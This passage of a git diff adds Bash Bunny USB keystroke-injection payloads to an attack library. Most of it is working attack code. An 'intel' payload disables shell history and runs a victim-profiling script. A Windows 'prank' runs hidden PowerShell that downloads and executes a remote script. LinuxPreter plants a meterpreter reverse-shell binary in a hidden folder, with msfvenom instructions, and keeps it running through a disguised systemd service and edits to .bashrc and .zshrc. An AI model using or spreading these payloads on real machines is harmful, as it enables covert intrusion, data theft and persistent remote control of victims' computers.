echo -e "******************************************" >> $mntt/loot/intel

56
payloads/library/exfiltration/intel/payload.txt Normal file
View File

@ -0,0 +1,56 @@
# Title: intel
# Description: intel(intelligence) payload collects detailed information of victims machine.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Exfiltration
# Target: GNU/Linux operating systems.
# Attackmodes: HID, Storage.
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/intel.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/intel.sh
Q ENTER
Q STRING /tmp/./intel.sh
Q ENTER
Q DELAY 25000
Q STRING rm /tmp/intel.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

2
payloads/library/poc/MacOS_EICAR/eicar.sh Normal file
View File

@ -0,0 +1,2 @@
#!/bin/bash
echo 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'\ >Desktop/Malware.txt

32
payloads/library/poc/MacOS_EICAR/payload.txt Normal file
View File

@ -0,0 +1,32 @@
#!/bin/bash
# Title: MacOS_EICAR
# Description: Bad USB PoC for MacOS.
# Author: Ciph3rtxt
# Category: PoC
# Target: MacOS
# Attackmodes: HID STORAGE
# Setup
LED R
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
path=/Volumes/BashBunny/payloads/$SWITCH_POSITION
# Execute Attack
LED R
DELAY 200
RUN OSX terminal
Q DELAY 2000
Q STRING cd
Q ENTER
Q DELAY 200
Q STRING chmod a+x $path/eicar.sh
Q ENTER
Q DELAY 200
Q STRING $path/eicar.sh
Q ENTER
Q DELAY 200
# Complete
LED G

19
payloads/library/poc/MacOS_EICAR/readme.md Normal file
View File

@ -0,0 +1,19 @@
# MacOS EICAR PoC
Author: Ciph3rtxt
## Category:
PoC
## Description:
Generates EICAR file to simulate USB (physical access) malware attack.
## Status:
|LED|STATUS|
|-|-|
|Red|Attack|
|Green|Complete|

2
payloads/library/prank/UnifiedRickRoll/payload.txt
View File

@ -13,7 +13,7 @@ Q DELAY 1000
Q GUI n Q GUI n
Q DELAY 1000 Q DELAY 1000
Q STRING hi=0\; ho=\$\(date \'+%H%M\'\)\; while test \$hi == \'0\'\; do if [ \$ho == $time ]\; then osascript -e \"set Volume 9\" \&\& open \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \; hi=1\; fi\; ho=\$\(date \'+%H%M\'\)\; sleep 1\; done \& disown Q STRING hi=0\; ho=\$\(date \'+%H%M\'\)\; while [ \$hi = \'0\' ]\; do if [ \$ho = $time ]\; then osascript -e \"set Volume 9\" \&\& open \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \; hi=1\; fi\; ho=\$\(date \'+%H%M\'\)\; sleep 1\; done \& disown
# close up shop # close up shop
Q DELAY 1000 Q DELAY 1000

37
payloads/library/prank/Win_PoSh_HiThere/payload.txt Normal file
View File

@ -0,0 +1,37 @@
#!/bin/bash
# Title: Hi There
# Description: Creates a hidden link file that override the ctrl+c functionality.
# So, when the user press ctrl+c it lunches the first sign-in animation.
# Author: Cribbit
# Version: 1.0
# Category: Pranks
# Target: Windows (Powershell 5.1+)
# Attackmodes: RNDIS_ETHERNET HID
# Props: v3ded, Hexacorn and Audibleblink (Python Server)
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED ATTACK
QUACK DELAY 200
RUN WIN "powershell -Noni -NoP -W h -EP Bypass -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\""
QUACK DELAY 500
QUACK CTRL c
LED FINISH

33
payloads/library/prank/Win_PoSh_HiThere/readme.md Normal file
View File

@ -0,0 +1,33 @@
# Hi There
- Author: Cribbit
- Version: 1.0
- Tested on: Windows 10 (Powershell 5.1+)
- Category: Pranks
- Attackmode: HID & RNDIS_ETHERNET
- Extensions: Run
- Props: v3ded, Hexacorn and Audibleblink (Python Server)
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Creates a hidden link file that override the ctrl+c functionality.
So, when the user press ctrl+c it lunches the first sign-in animation.
## Notes
to kill the animation, you need to open task manger and look for "First Sign-in Animation".
For extra evilness add `/explorer` to the `$shortcut.Arguments` line in the script file. Then you can't switch programs or kill it.
## More information
<https://v3ded.github.io/redteam/abusing-lnk-features-for-initial-access-and-persistence>
<https://www.hexacorn.com/blog/2022/01/16/windows-installation-animation/>
## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISHED | Green blink followed by SOLID | Injection finished |

19
payloads/library/prank/Win_PoSh_HiThere/s Normal file
View File

@ -0,0 +1,19 @@
$path = "$([Environment]::GetFolderPath('Desktop'))\readme.lnk"
$wshell = New-Object -ComObject Wscript.Shell
$shortcut = $wshell.CreateShortcut($path)
$shortcut.IconLocation = "C:\Windows\System32\shell32.dll,70"
$shortcut.TargetPath = "C:\Windows\System32\oobe\FirstLogonAnim.exe"
$shortcut.Arguments = "/RunFirstLogonAnim"
$shortcut.WorkingDirectory = "C:"
$shortcut.HotKey = "CTRL+C"
$shortcut.Description = "Contain very important information"
$shortcut.WindowStyle = 7
# 7 = Minimized window
# 3 = Maximized window
# 1 = Normal window
$shortcut.Save()
(Get-Item $path).Attributes += 'Hidden' # Optional if we want to make the link invisible (prevent user clicks)

36
payloads/library/remote_access/LinuxPreter/README.md Normal file
View File

@ -0,0 +1,36 @@
## About:
* Title: LinuxPreter
* Description: Injects meterpreter payload and makes it persistent.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Remote Access
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, Storage
## LinuxPreter injects meterpreter payload, make it persistent and triggers payload on launch of terminal/shell.
### Workflow:
* Keeping tracks clear by preventing storage of history.
* Fetching BashBunny's block device and mounting it.
* Transfering payload script and payload itself.
* Deleting scripts from victims machine and unmounting bunny.
### Create Meterpreter payload:
* ```msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP ADDRESS> LPORT=<PORT NO> -f elf -o sysHandle.bin```
* NOTE: Only change IP address and Port number in the above command.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| payload.txt | /payload/switch1/ |
| payload.sh | /payload/ |
| sysHandle.bin | /tools/ |
#### Support me if you like my work:
* https://twitter.com/drapl0n

12
payloads/library/remote_access/LinuxPreter/payload.sh Normal file
View File

@ -0,0 +1,12 @@
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
mkdir /var/tmp/.system
cp -r $mntt/tools/sysHandle.bin /var/tmp/.system
chmod +x /var/tmp/.system/sysHandle.bin
mkdir -p ~/.config/systemd/user/
systemctl --user start systemPer.service
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/./sysHandle.bin -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemPer.service
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service \" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service\" >> ~/.bashrc\nfi" > ~/tmmmp
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit

56
payloads/library/remote_access/LinuxPreter/payload.txt Normal file
View File

@ -0,0 +1,56 @@
# Title: LinuxPreter
# Description: Injects meterpreter payload and makes it persistent.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Remote Access
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 1000
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH